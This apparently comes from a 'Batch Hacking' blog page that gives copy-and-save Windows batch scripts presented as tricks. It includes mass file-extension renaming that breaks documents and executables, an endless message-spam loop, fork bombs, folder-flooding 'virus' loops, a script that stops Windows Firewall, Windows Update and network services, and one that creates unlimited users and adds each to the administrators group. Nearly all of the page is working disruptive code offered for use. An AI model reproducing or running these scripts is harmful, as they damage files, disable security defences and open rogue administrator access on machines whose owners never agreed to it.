show-notice
hide-notice
TwitterFacebook RSS FeedEmail
Showing posts with label Batch Hacking. Show all posts
Showing posts with label Batch Hacking. Show all posts

Cool Batch Files

Open Notepad & Type

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

Save as Sumit.bat

Msg Annoyer (Message Broadcaster)

Open Notepad & Type
@echo off

:netannoy
msg * Hi!
msg * How r u ?
msg * Wat's Up ?
msg * Myself Sumit Pahwa....
msg * My Web Links are....
msg * http://www.sumithackingarticles.blogspot.com/.....
msg * www.upscportal.in
msg * http://www.sumithackingarticles.blogspot.com/
goto netannoy
Save as sumit.bat

How to create 3000 folder in a single minute.

open notepad and type

@echo off
:loop
md %random%
goto loop

saveas sumit.bat

Cool Batch File Tricks

open notepad and type

@echo off

start
%0
goto :start
save as sumit.bat

Service Disabler

open notepad & type
@echo off

net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
save as sumit.bat

Fork Bombing

open notepad & type

@echo off
:loop
Explorer
Call fork.bat
Goto loop
save as sumithackingarticles.bat

How to make Folder Replicator Virus

Just open notepad & type

:loop

md Virus
cd Virus
goto loop
Now save it as sumit.bat

Create Unlimted User

open notepad & type
@echo off
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administrators %usr% /add
goto usrflood
Save as raj.bat